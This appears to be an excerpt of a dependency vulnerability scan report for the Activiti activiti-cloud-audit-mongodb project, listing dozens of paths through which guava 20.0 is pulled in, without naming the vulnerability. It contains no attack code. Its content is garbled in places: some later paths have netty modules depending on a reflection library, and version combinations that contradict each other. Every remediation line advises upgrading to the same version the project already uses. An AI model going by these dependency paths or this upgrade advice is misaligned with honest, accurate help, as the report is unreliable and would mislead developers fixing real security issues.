Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › io.springfox:springfox-swagger2@2.8.0 › io.springfox:springfox-swagger-common@2.8.0 › io.springfox:springfox-spring-web@2.8.0 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › io.springfox:springfox-swagger-ui@2.8.0 › io.springfox:springfox-spring-web@2.8.0 › io.springfox:springfox-spi@2.8.0 › io.springfox:springfox-core@2.8.0 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › io.springfox:springfox-swagger2@2.8.0 › io.springfox:springfox-spring-web@2.8.0 › io.springfox:springfox-spi@2.8.0 › io.springfox:springfox-core@2.8.0 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › io.springfox:springfox-swagger2@2.8.0 › io.springfox:springfox-schema@2.8.0 › io.springfox:springfox-spi@2.8.0 › io.springfox:springfox-core@2.8.0 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › io.springfox:springfox-swagger2@2.8.0 › io.springfox:springfox-swagger-common@2.8.0 › io.springfox:springfox-spi@2.8.0 › io.springfox:springfox-core@2.8.0 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › io.springfox:springfox-swagger2@2.8.0 › io.springfox:springfox-swagger-common@2.8.0 › io.springfox:springfox-schema@2.8.0 › io.springfox:springfox-core@2.8.0 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › io.springfox:springfox-swagger2@2.8.0 › io.springfox:springfox-swagger-common@2.8.0 › io.springfox:springfox-spring-web@2.8.0 › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › com.querydsl:querydsl-apt@4.1.4 › com.querydsl:querydsl-codegen@4.1.4 › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › com.querydsl:querydsl-apt@4.1.4 › com.querydsl:querydsl-codegen@4.1.4 › com.mysema.codegen:codegen@0.6.8 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.netflix.netflix-commons:netflix-eventbus@0.3.0 › com.netflix.netflix-commons:netflix-infix@0.3.0 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.netflix.netflix-commons:netflix-eventbus@0.3.0 › com.netflix.servo:servo-core@0.5.3 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › io.springfox:springfox-swagger2@2.8.0 › io.springfox:springfox-swagger-common@2.8.0 › io.springfox:springfox-spring-web@2.8.0 › io.springfox:springfox-spi@2.8.0 › io.springfox:springfox-core@2.8.0 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › io.springfox:springfox-swagger2@2.8.0 › io.springfox:springfox-swagger-common@2.8.0 › io.springfox:springfox-schema@2.8.0 › io.springfox:springfox-spi@2.8.0 › io.springfox:springfox-core@2.8.0 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.netflix.netflix-commons:netflix-eventbus@0.3.0 › com.netflix.netflix-commons:netflix-infix@0.3.0 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.netflix.netflix-commons:netflix-eventbus@0.3.0 › com.netflix.netflix-commons:netflix-infix@0.3.0 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.netflix.netflix-commons:netflix-eventbus@0.3.0 › com.netflix.servo:servo-core@0.5.3 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.netflix.netflix-commons:netflix-eventbus@0.3.0 › com.netflix.servo:servo-core@0.5.3 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.netflix.netflix-commons:netflix-eventbus@0.3.0 › com.netflix.netflix-commons:netflix-infix@0.3.0 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.netflix.netflix-commons:netflix-eventbus@0.3.0 › com.netflix.servo:servo-core@0.5.3 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-handler@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-codec-http@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-handler@4.2.7.Final › io.netty:netty-codec-base@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-codec-http@4.2.7.Final › io.netty:netty-codec-base@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-codec-http@4.2.7.Final › io.netty:netty-codec-compression@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-codec-http@4.2.7.Final › io.netty:netty-handler@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-handler@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-handler@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-codec-http@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-transport-native-epoll@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-transport-native-io_uring@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-transport-native-kqueue@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-codec-http@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-codec-http@4.2.7.Final › io.netty:netty-codec-compression@4.2.7.Final › io.netty:netty-codec-base@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-codec-http@4.2.7.Final › io.netty:netty-handler@4.2.7.Final › io.netty:netty-codec-base@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-handler@4.2.7.Final › io.netty:netty-codec-base@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-codec-http@4.2.7.Final › io.netty:netty-codec-base@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-codec-http@4.2.7.Final › io.netty:netty-codec-compression@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-codec-http@4.2.7.Final › io.netty:netty-handler@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-handler@4.2.7.Final › io.netty:netty-codec-base@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-codec-http@4.2.7.Final › io.netty:netty-codec-base@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
